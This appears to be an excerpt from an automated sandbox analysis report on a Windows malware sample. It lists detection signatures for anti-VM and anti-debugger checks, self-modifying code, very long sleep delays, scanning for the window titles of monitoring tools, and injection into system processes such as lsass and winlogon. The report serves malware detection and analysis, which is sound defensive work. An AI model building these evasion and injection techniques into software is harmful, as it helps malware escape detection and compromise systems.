              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Contains functionality to compare user and computer (likely to detect sandboxes)
              Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,49_2_00000001400010C0
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\AppData\Roaming\LB31.exeSpecial instruction interceptor: First address: 7FF70B136D85 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Roaming\LB31.exeSpecial instruction interceptor: First address: 7FF70ADFD3D8 instructions caused by: Self-modifying code
              Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF6AEA76D85 instructions caused by: Self-modifying code
              Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF6AE73D3D8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 1ABA0000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7288Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2475Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7934Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1827Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7582
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2153
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7910
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1675
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6862
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1428
              Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 795
              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8387
              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1613
              Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9640
              Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_62-15213
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_19-15094
              Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_16-15003
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_63-15146
              Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_49-408
              Source: C:\Windows\System32\conhost.exeAPI coverage: 4.7 %
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 4.9 %
              Source: C:\Windows\System32\lsass.exeAPI coverage: 6.5 %
              Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
              Source: C:\Users\user\Desktop\file.exe TID: 1936Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep count: 7934 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep count: 1827 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7688Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -25825441703193356s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 7910 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 1675 > 30
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1372Thread sleep count: 63 > 30
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 1372Thread sleep time: -63000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 6862 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep count: 1428 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\dialer.exe TID: 5980Thread sleep count: 795 > 30
              Source: C:\Windows\System32\dialer.exe TID: 5980Thread sleep time: -79500s >= -30000s
              Source: C:\Windows\System32\winlogon.exe TID: 7580Thread sleep count: 8387 > 30
              Source: C:\Windows\System32\winlogon.exe TID: 7580Thread sleep time: -8387000s >= -30000s
              Source: C:\Windows\System32\winlogon.exe TID: 7580Thread sleep count: 1613 > 30
              Source: C:\Windows\System32\winlogon.exe TID: 7580Thread sleep time: -1613000s >= -30000s
              Source: C:\Windows\System32\lsass.exe TID: 3664Thread sleep count: 9640 > 30
              Source: C:\Windows\System32\lsass.exe TID: 3664Thread sleep time: -9640000s >= -30000s
              Source: C:\Windows\System32\lsass.exe TID: 3664Thread sleep count: 252 > 30
              Source: C:\Windows\System32\lsass.exe TID: 3664Thread sleep time: -252000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 3940Thread sleep count: 250 > 30
              Source: C:\Windows\System32\svchost.exe TID: 3940Thread sleep time: -250000s >= -30000s
              Source: C:\Windows\System32\dwm.exe TID: 2540Thread sleep count: 36 > 30
              Source: C:\Windows\System32\dwm.exe TID: 2540Thread sleep time: -36000s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
              Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
              Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14EDCE0 FindFirstFileExW,16_2_000001DCB14EDCE0
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246446DCE0 FindFirstFileExW,19_2_000002246446DCE0
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165EDCE0 FindFirstFileExW,54_2_000002D0165EDCE0
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151DCE0 FindFirstFileExW,62_2_000002D6F151DCE0
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FDDCE0 FindFirstFileExW,63_2_0000014E41FDDCE0
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B05DCE0 FindFirstFileExW,64_2_000001D15B05DCE0
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: mshta.exe, 0000000C.00000003.2287264466.000002AECD07F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000005.00000002.2332993392.0000015FEB334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
              Source: powershell.exe, 00000005.00000002.2332993392.0000015FEB306000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
              Source: mshta.exe, 0000000C.00000003.2286360520.000002A6CAB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308792224.000002A6CAB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2298038675.000002A6CAB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307610258.000002A6CAB89000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2762887395.000002B01D65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2756925540.000002B01802B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm]
              Source: powershell.exe, 0000000F.00000002.2891882424.000002687A410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
              Source: mshta.exe, 0000000C.00000003.2287264466.000002AECD07F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000007.00000002.2293866711.000001CF7AE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_49-471
              Source: C:\Users\user\AppData\Roaming\LB31.exeSystem information queried: ModuleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: regmonclass
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: procmon_window_class
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: filemonclass
              Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess queried: DebugPort
              Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
              Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugObjectHandle
              Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001DCB14ED2A4
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14EF830 GetProcessHeap,16_2_000001DCB14EF830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001DCB14ED2A4
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001DCB14E7D90
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246446D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002246446D2A4
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_0000022464467D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000022464467D90
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_000002D0165E7D90
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165F6218 SetUnhandledExceptionFilter,54_2_000002D0165F6218
